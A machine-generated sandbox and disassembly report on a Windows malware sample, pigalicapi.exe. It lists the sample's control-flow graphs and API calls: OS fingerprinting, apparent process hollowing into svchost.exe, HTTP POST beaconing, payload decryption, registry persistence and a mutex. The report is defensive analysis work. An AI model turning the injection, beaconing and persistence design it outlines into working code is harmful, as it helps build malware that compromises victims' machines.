                                                                                                                                                                                control_flow_graph 204 5d8f80-5d8f94 205 5d927b-5d9281 204->205 206 5d8f9a-5d8f9e 204->206 206->205 207 5d8fa4-5d8fa8 206->207 207->205 208 5d8fae-5d8fff call 5d7d20 * 3 GetVersionExA 207->208 215 5d9005-5d9016 GetSystemInfo 208->215 216 5d9266-5d926a 208->216 218 5d901c-5d9023 215->218 219 5d9115-5d911c 215->219 216->205 217 5d926c-5d9275 lstrcatA 216->217 217->205 222 5d9025-5d903d lstrcatA 218->222 223 5d9042-5d9049 218->223 220 5d9210-5d9217 call 5d9290 219->220 221 5d9122-5d9129 219->221 243 5d9219-5d9222 lstrcatA 220->243 244 5d9228-5d9237 lstrlenA 220->244 224 5d912b-5d9132 221->224 225 5d9174-5d917b 221->225 227 5d9110 222->227 228 5d9068-5d906f 223->228 229 5d904b-5d9063 lstrcatA 223->229 233 5d914e-5d9155 224->233 234 5d9134-5d914c lstrcatA 224->234 231 5d917d-5d9184 225->231 232 5d91c3-5d91ca 225->232 227->220 228->227 230 5d9075-5d907c 228->230 229->227 236 5d907e-5d9085 230->236 237 5d90a1-5d90ab GetSystemMetrics 230->237 238 5d9186-5d919e lstrcatA 231->238 239 5d91a0-5d91a7 231->239 232->220 240 5d91cc-5d91d3 232->240 241 5d916f 233->241 242 5d9157-5d9169 lstrcatA 233->242 234->241 236->237 247 5d9087-5d909f lstrcatA 236->247 248 5d90ad-5d90c5 lstrcatA 237->248 249 5d90c7-5d90d1 GetSystemMetrics 237->249 250 5d91c1 238->250 239->250 251 5d91a9-5d91bb lstrcatA 239->251 252 5d91ef-5d91f6 240->252 253 5d91d5-5d91ed lstrcatA 240->253 241->220 242->241 243->244 245 5d9259-5d9263 lstrlenA 244->245 246 5d9239-5d9253 lstrcatA * 2 244->246 245->216 246->245 247->227 248->227 254 5d90ed-5d90f6 249->254 255 5d90d3-5d90eb lstrcatA 249->255 250->220 251->250 252->220 256 5d91f8-5d920a lstrcatA 252->256 253->220 254->227 257 5d90f8-5d910a lstrcatA 254->257 255->227 256->220 257->227
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExA.KERNEL32(0000009C), ref: 005D8FF7
                                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 005D9009
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,Win2K), ref: 005D902E
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,WinXP), ref: 005D9054
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,Vista), ref: 005D913D
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 005D9160
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 005D918F
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,Win7), ref: 005D91B2
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 005D91DE
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,Win8), ref: 005D9201
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,_x64), ref: 005D9222
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 005D922F
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,005DC980), ref: 005D9242
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,?), ref: 005D9253
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D925D
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 005D9275
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                • API String ID: 3139318632-332591429
                                                                                                                                                                                • Opcode ID: 8e04676802a58d4b026c881278e4b9f4de0a9580cce6b71775186a4aebc9fd5b
                                                                                                                                                                                • Instruction ID: ff3c134bf6545dfe5d4681c4f587dada2fe146b9ab8f50950c8555766039d16e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e04676802a58d4b026c881278e4b9f4de0a9580cce6b71775186a4aebc9fd5b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5981187864120AEBDB309FA8CC5DBAE7F75BB19301F008947F805A6380D775DA84DBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 005D20D4
                                                                                                                                                                                • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 005D20E6
                                                                                                                                                                                • lstrcatA.KERNEL32(?,005DC38C), ref: 005D20FE
                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 005D210F
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 005D2187
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 005D21C0
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D21D5
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D21FE
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 005D2227
                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 005D2245
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 005D2252
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 005D225F
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D2270
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                • API String ID: 1819736980-1559310322
                                                                                                                                                                                • Opcode ID: c16255a5f82958dc729a89ef466d087637f25d0bc6423854d9d7f92ed5665079
                                                                                                                                                                                • Instruction ID: e98f65610ae00f7b74ede7d8c6db84040451aa12913d08ea65060240903e4898
                                                                                                                                                                                • Opcode Fuzzy Hash: c16255a5f82958dc729a89ef466d087637f25d0bc6423854d9d7f92ed5665079
                                                                                                                                                                                • Instruction Fuzzy Hash: 86D16575A40216EBCB38CF54DC98FAD7BB9FB58304F04859AF609A7281D6309B84CF54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 450 5d1840-5d1854 451 5d185a-5d185e 450->451 452 5d1c95-5d1c9b 450->452 451->452 453 5d1864-5d1868 451->453 453->452 454 5d186e-5d1872 453->454 454->452 455 5d1878-5d190a call 5d7d20 InternetCrackUrlA 454->455 455->452 458 5d1910-5d1930 InternetOpenA 455->458 458->452 459 5d1936-5d1969 InternetConnectA 458->459 460 5d196f-5d19a7 HttpOpenRequestA 459->460 461 5d1c88-5d1c8f InternetCloseHandle 459->461 462 5d19ad-5d19e5 wnsprintfA HttpAddRequestHeadersA 460->462 463 5d1c7b-5d1c82 InternetCloseHandle 460->463 461->452 464 5d1c6e-5d1c75 InternetCloseHandle 462->464 465 5d19eb-5d19f9 462->465 463->461 464->463 466 5d19fb-5d19fe 465->466 467 5d1a04-5d1a26 InternetSetOptionA 465->467 466->467 468 5d1a30-5d1a75 call 5d7d20 HttpSendRequestA 467->468 471 5d1c4c-5d1c5f 468->471 472 5d1a7b-5d1aa1 HttpQueryInfoA 468->472 471->464 473 5d1c61-5d1c68 471->473 474 5d1ac9-5d1b0f call 5d7d20 HttpQueryInfoA 472->474 475 5d1aa3-5d1abc call 5d7dd0 472->475 473->464 473->468 480 5d1b47-5d1b6a VirtualAlloc 474->480 481 5d1b11-5d1b2d call 5d7dd0 474->481 475->474 482 5d1abe-5d1ac7 475->482 484 5d1c19 480->484 485 5d1b70-5d1b93 480->485 481->480 489 5d1b2f-5d1b39 481->489 482->474 486 5d1c23-5d1c4a InternetReadFile 484->486 488 5d1b99-5d1bc9 InternetReadFile 485->488 486->471 486->486 490 5d1bdb-5d1be2 488->490 491 5d1bcb-5d1bd9 488->491 489->480 492 5d1b3b-5d1b41 489->492 493 5d1be4 490->493 494 5d1be6-5d1c11 490->494 491->490 492->480 495 5d1c17 493->495 496 5d1c15 494->496 497 5d1c13 494->497 495->471 496->488 497->495
                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 005D1902
                                                                                                                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 005D191D
                                                                                                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005D1956
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,00200300,00000000), ref: 005D1994
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 005D19C2
                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 005D19DD
                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 005D1A16
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D1A6D
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005D1A99
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 005D1B07
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 005D1B57
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 005D1BBF
                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 005D1C3D
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D1C75
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D1C82
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D1C8F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                • String ID: */*$0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                • API String ID: 880997049-2033563659
                                                                                                                                                                                • Opcode ID: 370dda89558a64ef5db975d4bab6f1793560d5201ca7de169c234b709233c8e9
                                                                                                                                                                                • Instruction ID: 9ffa1b9cd491ded0125f3ca669b216ede8805ae64d372e2da6aa42a7114566d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 370dda89558a64ef5db975d4bab6f1793560d5201ca7de169c234b709233c8e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 34C13BB1D44228ABEB30CF54CC49BE9BBB5FB98304F0041DAE50DA6290DB766E94CF54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 498 5d47f0-5d4801 499 5d4aab-5d4ab1 498->499 500 5d4807-5d480e 498->500 500->499 501 5d4814-5d4832 CryptAcquireContextA 500->501 502 5d4834-5d483f GetLastError 501->502 503 5d4856-5d485a 501->503 502->503 504 5d4841-5d4850 CryptAcquireContextA 502->504 503->499 505 5d4860-5d489d 503->505 504->503 507 5d4a9f-5d4aa5 CryptReleaseContext 505->507 508 5d48a3-5d48f3 call 5d7b70 CryptCreateHash 505->508 507->499 511 5d48f9-5d4913 CryptHashData 508->511 512 5d4a90-5d4a96 508->512 515 5d4919-5d4944 CryptDeriveKey 511->515 516 5d4a83-5d4a8a CryptDestroyHash 511->516 513 5d4a98 512->513 514 5d4a9a 512->514 513->507 514->507 515->516 517 5d494a-5d498f CryptDecrypt CryptDestroyKey 515->517 516->512 517->516 518 5d4995-5d49b1 CryptCreateHash 517->518 518->516 519 5d49b7-5d49d4 CryptHashData 518->519 520 5d49da-5d4a0f CryptGetHashParam 519->520 521 5d4a76-5d4a7d CryptDestroyHash 519->521 520->521 522 5d4a11-5d4a3c CryptGetHashParam 520->522 521->516 522->521 523 5d4a3e-5d4a58 call 5d7c70 522->523 523->521 526 5d4a5a-5d4a72 call 5d7b70 523->526 526->521
                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D482A
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D4834
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D4850
                                                                                                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D48EB
                                                                                                                                                                                • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 005D490B
                                                                                                                                                                                • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 005D493C
                                                                                                                                                                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 005D496F
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D4982
                                                                                                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 005D49A9
                                                                                                                                                                                • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 005D49CC
                                                                                                                                                                                • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 005D4A07
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0$eF]
                                                                                                                                                                                • API String ID: 2739279601-4103169918
                                                                                                                                                                                • Opcode ID: fc1ab64b70ca994701a0b24aa0ae9fdcb509c89fdd697d2357530867aa5b042f
                                                                                                                                                                                • Instruction ID: a273e16fbfb8011c7e62b6cacb0244495fe45e5141c0918aa540d4a97676da52
                                                                                                                                                                                • Opcode Fuzzy Hash: fc1ab64b70ca994701a0b24aa0ae9fdcb509c89fdd697d2357530867aa5b042f
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F715E71A50319ABDB35CB54CC49BEE7B7DBB48700F00419BF609AA280DBB59B88CF54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 626 5d3b00-5d3b5c call 5d1000 call 5d3130 call 5d2ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 5d4510 635 5d400a-5d400c ExitProcess 626->635 636 5d3b62-5d3c8c call 5d7d20 call 5d5700 call 5d5a00 call 5d7d20 call 5d9400 call 5d99f0 call 5d6060 call 5d5e00 StrStrIA call 5d1120 call 5d5e30 call 5d6cf0 call 5d5f30 call 5d9b90 WSAStartup 626->636 636->635 663 5d3c92-5d3cb1 636->663 664 5d3cc0-5d3cc9 663->664 665 5d3cb3-5d3cbb 663->665 666 5d3ccb-5d3cd4 664->666 667 5d3cda-5d3ce3 664->667 665->664 666->667 668 5d3ce5-5d3cee 667->668 669 5d3cf4-5d3cfd 667->669 668->669 670 5d3d0c-5d3d15 669->670 671 5d3cff-5d3d07 669->671 672 5d3d17-5d3d20 670->672 673 5d3d26-5d3d2f 670->673 671->670 672->673 674 5d3d31-5d3d3a 673->674 675 5d3d40-5d3dfd call 5d7d20 call 5da700 call 5da4b0 call 5d5b50 call 5d8a70 673->675 674->675 686 5d3dff-5d3e3f call 5d7d20 call 5d78d0 675->686 687 5d3e49 675->687 686->687 689 5d3e53-5d3eab call 5d7970 call 5d4020 687->689 697 5d3f8a 689->697 698 5d3eb1-5d3ed9 call 5d4020 689->698 700 5d3f91-5d3f9a 697->700 704 5d3edf-5d3efa call 5d4020 698->704 705 5d3f81 698->705 702 5d3fed-5d3ffa Sleep 700->702 703 5d3f9c-5d3fa3 700->703 702->689 706 5d3fa5-5d3fac 703->706 707 5d3fd0-5d3fd7 703->707 713 5d3eff-5d3f07 704->713 708 5d3f88 705->708 710 5d3fae-5d3fc2 706->710 711 5d3fc4 706->711 707->702 712 5d3fd9-5d3fe3 707->712 708->700 714 5d3fce 710->714 711->714 712->702 715 5d3f09-5d3f50 call 5d42e0 call 5d4020 713->715 716 5d3f78 713->716 714->702 722 5d3f59-5d3f60 715->722 723 5d3f52 715->723 717 5d3f7f 716->717 717->708 724 5d3f76 722->724 725 5d3f62-5d3f70 VirtualFree 722->725 723->722 724->717 725->724
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 005D3B2D
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(005D5DB0), ref: 005D3B38
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 005D3B40
                                                                                                                                                                                  • Part of subcall function 005D4510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 005D456C
                                                                                                                                                                                  • Part of subcall function 005D4510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D458B
                                                                                                                                                                                  • Part of subcall function 005D4510: GetFileSize.KERNEL32(000000FF,00000000), ref: 005D45AD
                                                                                                                                                                                  • Part of subcall function 005D4510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D45D6
                                                                                                                                                                                  • Part of subcall function 005D4510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 005D4617
                                                                                                                                                                                  • Part of subcall function 005D4510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 005D463E
                                                                                                                                                                                  • Part of subcall function 005D4510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D47C0
                                                                                                                                                                                  • Part of subcall function 005D4510: CloseHandle.KERNEL32(00000000), ref: 005D47E0
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 005D400C
                                                                                                                                                                                  • Part of subcall function 005D5700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 005D5742
                                                                                                                                                                                  • Part of subcall function 005D5700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 005D57B8
                                                                                                                                                                                  • Part of subcall function 005D5700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 005D57F1
                                                                                                                                                                                  • Part of subcall function 005D5700: wnsprintfA.SHLWAPI ref: 005D582F
                                                                                                                                                                                  • Part of subcall function 005D5700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D5854
                                                                                                                                                                                  • Part of subcall function 005D5700: GetFileSize.KERNEL32(000000FF,00000000), ref: 005D586D
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrcpyA.KERNEL32(Mrktsgokwkyai,WDefault), ref: 005D5A47
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrlenA.KERNEL32(005DC4E0), ref: 005D5A7D
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrcpyA.KERNEL32(00000000,005DC4E0), ref: 005D5A97
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrlenA.KERNEL32(00000000), ref: 005D5AA1
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrlenA.KERNEL32(Mrktsgokwkyai), ref: 005D5AAE
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrcatA.KERNEL32(00000000,Mrktsgokwkyai), ref: 005D5AC8
                                                                                                                                                                                  • Part of subcall function 005D5A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 005D5B00
                                                                                                                                                                                  • Part of subcall function 005D5A00: RegCloseKey.KERNEL32(00000000), ref: 005D5B0E
                                                                                                                                                                                  • Part of subcall function 005D5A00: lstrlenA.KERNEL32(00000000), ref: 005D5B3B
                                                                                                                                                                                  • Part of subcall function 005D9400: lstrcpyA.KERNEL32(?,00000000), ref: 005D9513
                                                                                                                                                                                  • Part of subcall function 005D9400: CharUpperA.USER32(?), ref: 005D9521
                                                                                                                                                                                  • Part of subcall function 005D99F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 005D9A0A
                                                                                                                                                                                  • Part of subcall function 005D99F0: OpenProcessToken.ADVAPI32(00000000), ref: 005D9A11
                                                                                                                                                                                  • Part of subcall function 005D99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 005D9A3A
                                                                                                                                                                                  • Part of subcall function 005D99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 005D9A77
                                                                                                                                                                                  • Part of subcall function 005D99F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 005D9AAD
                                                                                                                                                                                  • Part of subcall function 005D99F0: EqualSid.ADVAPI32(?,00000000), ref: 005D9AC3
                                                                                                                                                                                  • Part of subcall function 005D6060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 005D6082
                                                                                                                                                                                  • Part of subcall function 005D5E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,005D3BEB), ref: 005D5E0C
                                                                                                                                                                                  • Part of subcall function 005D5E00: GetLastError.KERNEL32(?,005D3BEB), ref: 005D5E12
                                                                                                                                                                                • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 005D3BFA
                                                                                                                                                                                  • Part of subcall function 005D1120: lstrlenA.KERNEL32(00000000), ref: 005D1148
                                                                                                                                                                                  • Part of subcall function 005D1120: lstrlenA.KERNEL32(00000000), ref: 005D115A
                                                                                                                                                                                  • Part of subcall function 005D1120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 005D1182
                                                                                                                                                                                  • Part of subcall function 005D1120: wnsprintfA.SHLWAPI ref: 005D11BD
                                                                                                                                                                                  • Part of subcall function 005D1120: lstrcmpiA.KERNEL32(00000104,?), ref: 005D11D1
                                                                                                                                                                                  • Part of subcall function 005D1120: CopyFileA.KERNEL32 ref: 005D11F0
                                                                                                                                                                                  • Part of subcall function 005D1120: SetFileAttributesA.KERNEL32(?,00000006), ref: 005D11FF
                                                                                                                                                                                  • Part of subcall function 005D1120: lstrcpyA.KERNEL32(00000104,?), ref: 005D1210
                                                                                                                                                                                  • Part of subcall function 005D1120: lstrcpyA.KERNEL32(00000000,?), ref: 005D1249
                                                                                                                                                                                  • Part of subcall function 005D1120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 005D125D
                                                                                                                                                                                  • Part of subcall function 005D1120: CreateThread.KERNEL32 ref: 005D1274
                                                                                                                                                                                  • Part of subcall function 005D5E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 005D5E7E
                                                                                                                                                                                  • Part of subcall function 005D5E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 005D5EB2
                                                                                                                                                                                  • Part of subcall function 005D5E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 005D5ED6
                                                                                                                                                                                  • Part of subcall function 005D5E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 005D5F0B
                                                                                                                                                                                  • Part of subcall function 005D5E30: RegCloseKey.KERNEL32(00000000), ref: 005D5F19
                                                                                                                                                                                  • Part of subcall function 005D6CF0: RegOpenKeyExA.KERNEL32(80000001,005E3B88,00000000,000F003F,00000000), ref: 005D6D30
                                                                                                                                                                                  • Part of subcall function 005D6CF0: RegQueryValueExA.KERNEL32(00000000,005E3FA6,00000000,00000003,?,00000020), ref: 005D6D61
                                                                                                                                                                                  • Part of subcall function 005D6CF0: RegDeleteValueA.ADVAPI32(00000000,005E3FA6), ref: 005D6D7E
                                                                                                                                                                                  • Part of subcall function 005D6CF0: RegCloseKey.ADVAPI32(00000000), ref: 005D6D88
                                                                                                                                                                                  • Part of subcall function 005D5F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 005D5F67
                                                                                                                                                                                  • Part of subcall function 005D5F30: lstrcatA.KERNEL32(?,005E3FE2), ref: 005D5F7A
                                                                                                                                                                                  • Part of subcall function 005D5F30: RegOpenKeyExA.ADVAPI32(80000001,X<],00000000,000F003F,00000000), ref: 005D5FB3
                                                                                                                                                                                  • Part of subcall function 005D5F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 005D5FF2
                                                                                                                                                                                  • Part of subcall function 005D5F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 005D603B
                                                                                                                                                                                  • Part of subcall function 005D5F30: RegCloseKey.ADVAPI32(00000000), ref: 005D6045
                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 005D3C85
                                                                                                                                                                                  • Part of subcall function 005D4020: InitializeCriticalSection.KERNEL32(?), ref: 005D4066
                                                                                                                                                                                  • Part of subcall function 005D4020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 005D407A
                                                                                                                                                                                  • Part of subcall function 005D4020: EnterCriticalSection.KERNEL32(?,?), ref: 005D40AF
                                                                                                                                                                                  • Part of subcall function 005D4020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D40C6
                                                                                                                                                                                  • Part of subcall function 005D4020: TerminateThread.KERNEL32(00000000,00000000), ref: 005D40E6
                                                                                                                                                                                  • Part of subcall function 005D4020: ResetEvent.KERNEL32(00000000), ref: 005D40F7
                                                                                                                                                                                  • Part of subcall function 005D4020: LeaveCriticalSection.KERNEL32(?), ref: 005D4101
                                                                                                                                                                                  • Part of subcall function 005D4020: CreateThread.KERNEL32 ref: 005D4118
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D3F70
                                                                                                                                                                                • Sleep.KERNEL32(?), ref: 005D3FF4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                • String ID: C:\Users\user\pigalicapi.exe$R+g$Wopkesjym$pigalicapi$svchost.exe
                                                                                                                                                                                • API String ID: 1389186475-3920990616
                                                                                                                                                                                • Opcode ID: 7f76616e526ff7236cd6eb53741d0eed6ea4c72ec42d7830869fa39f1662bd6f
                                                                                                                                                                                • Instruction ID: 9311e35a5ea5adc4c56baa3bf34ccd5156e3e7638308a2924f5cb960b3cd27bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f76616e526ff7236cd6eb53741d0eed6ea4c72ec42d7830869fa39f1662bd6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 00C1F7B1D042A69AE738DB689C4EBBA3B707B54701F0444EBF1885A2D2E77447C8DF51
